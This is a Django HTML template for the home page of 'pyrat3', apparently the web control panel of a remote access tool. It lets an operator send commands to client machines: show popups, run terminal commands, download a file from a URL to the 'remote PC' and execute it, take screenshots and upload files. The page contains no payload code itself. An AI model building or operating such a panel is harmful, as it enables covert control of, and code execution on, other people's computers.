<!DOCTYPE html>
<html lang="en">
<head>
    {% load static %}
    {% load user_tags %}
    <meta charset="UTF-8">
    <link rel="stylesheet" href="{% static 'css/styles.css' %}">
    <title>pyrat3 :: home</title>
    <script src="https://code.jquery.com/jquery-3.4.0.min.js"
            integrity="sha256-BJeo0qm959uMBGb65z40ejJYGSgR7REI4+CW1fNKwOg="
            crossorigin="anonymous">
    </script>
</head>
<body>
    <div id="header_area" class="header-area">
        <pre>
 ______   __  __     ______     ______     ______
/\  == \ /\ \_\ \   /\  == \   /\  __ \   /\__  _\
\ \  _-/ \ \____ \  \ \  __<   \ \  __ \  \/_/\ \/
 \ \_\    \/\_____\  \ \_\ \_\  \ \_\ \_\    \ \_\
  \/_/     \/_____/   \/_/ /_/   \/_/\/_/     \/_/
        </pre>
    </div>
    <div id="form_area" class="form-area">
        <form id="command_form">
            {% csrf_token %}
            {{ form.non_field_errors }}
            {{ form.source.errors }}
            {{ form.source }}
            <div id="form_area_command_id_box" class="form-area-command-id-box">
                {{ form.command_id.label_tag }}
                {{ form.command_id.errors }}
                {{ form.command_id }}
            </div>
            <div id="form_area_client_id_box" class="form-area-client-id-box">
                {{ form.client_id.label_tag }}
                {{ form.client_id.errors }}
                {{ form.client_id }}
            </div>
            <div id="form_area_command_box" class="form-area-command-box">
                {{ form.command.label_tag }}
                {{ form.command.errors }}
                {{ form.command }}
            </div>
            <div id="form_area_initial_args_box" class="form-area-initial-args-box">
                <label>Command args:</label>
                <p>Please select radio button with type of command to see required arguments</p>
            </div>
            <div id="form_area_popup_args_box" class="form-area-command-args-box">
                <label>Popup args:</label>
                <div class="form-area-arg-field">
                    <label for="title">Title: </label>
                    <textarea name="title" id="title"></textarea>
                </div>
                <div class="form-area-arg-field">
                    <label for="text">Text: </label>
                    <textarea name="text" id="text"></textarea>
                </div>
            </div>
            <div id="form_area_run_command_args_box" class="form-area-command-args-box">
                <label>
                    Run command args:
                    <a href="#" id="add_input">+</a>
                    <a href="#" id="remove_input">-</a>
                </label>
                <div class="form-area-arg-field">
                    <label for="terminal">Terminal:</label>
                     <select name = "terminal" id="terminal">
                        <option value = "True" selected>True</option>
                        <option value = "False">False</option>
                     </select>
                </div>
                <div class="form-area-arg-field">
                    <label for="arg0">Arg0:</label>
                    <textarea name="arg0" id="arg0"></textarea>
                </div>
                <script>
                    var max_fields = 8;
                    var min_fields = 2;
                    var ct = 1;
                    var wrapper = $('#form_area_run_command_args_box');

                    $(wrapper).on('click', '#add_input', function(e) {
                        e.preventDefault();
                        var total_fields = $('#form_area_run_command_args_box > div').length
                        if(total_fields <= max_fields){
                            // Additional div must be added, for removing button function
                            $(wrapper).append(`<div class="form-area-arg-field"><label for="arg${ct}">Arg${ct}:</label>\
                            <textarea name="arg${ct}" id="arg${ct}" required="required"></textarea></div>`);
                            ct++;
                        } else {
                        alert('Maximum field count was reached');
                        }
                    });
                    $(wrapper).on('click', '#remove_input', function(e) {
                        e.preventDefault();
                        var total_fields = $('#form_area_run_command_args_box > div').length
                        if(total_fields > min_fields){
                            $(wrapper).children().last().remove();
                            ct--;
                        } else {
                        alert('Minimum field count was reached');
                        }
                    });
                </script>
            </div>
            <div id="form_area_file_download_args_box" class="form-area-command-args-box">
                <label>Download file args</label>
                <div class="form-area-arg-field">
                    <label for="url">URL:</label>
                    <textarea name="url"  id="url"></textarea>
                </div>
                <div class="form-area-arg-field">
                    <label for="d_path">Save path on remote PC:</label>
                    <textarea name="d_path"  id="d_path"></textarea>
                </div>
                <div class="form-area-arg-field">
                    <label for="arg0">Execute:</label>
                     <select name = "execute"  id="execute">
                        <option value = "True" selected>True</option>
                        <option value = "False">False</option>
                     </select>
                </div>
            </div>
            <div id="form_area_screenshot_args_box" class="form-area-command-args-box">
                <label>Screenshot args:</label>
                <p>Screenshot command has no args</p>
            </div>
            <div id="form_area_file_upload_args_box" class="form-area-command-args-box">
                <label>Upload file args</label>
                <div class="form-area-arg-field">
                    <label for="file_path">Save path on remote PC:</label>
                    <textarea name="file_path"  id="file_path"></textarea>
                </div>
            </div>
            <div id="form_area_command_args_box" class="form-area-command-args-box">
                {{ form.command_args.label_tag }}
                {{ form.command_args.errors }}
                {{ form.command_args }}
            </div>
            <button id="form_area_send_command" class="form-area-send-command" type="submit">GO!</button>
        </form>
    </div>
    <div id="ajax_status" class="ajax-status" >
        No information about last AJAX request.
    </div>
    <div id="fresh_client_table">
    </div>
    <script src="{% static 'js/scripts.js' %}"></script>
</body>
</html>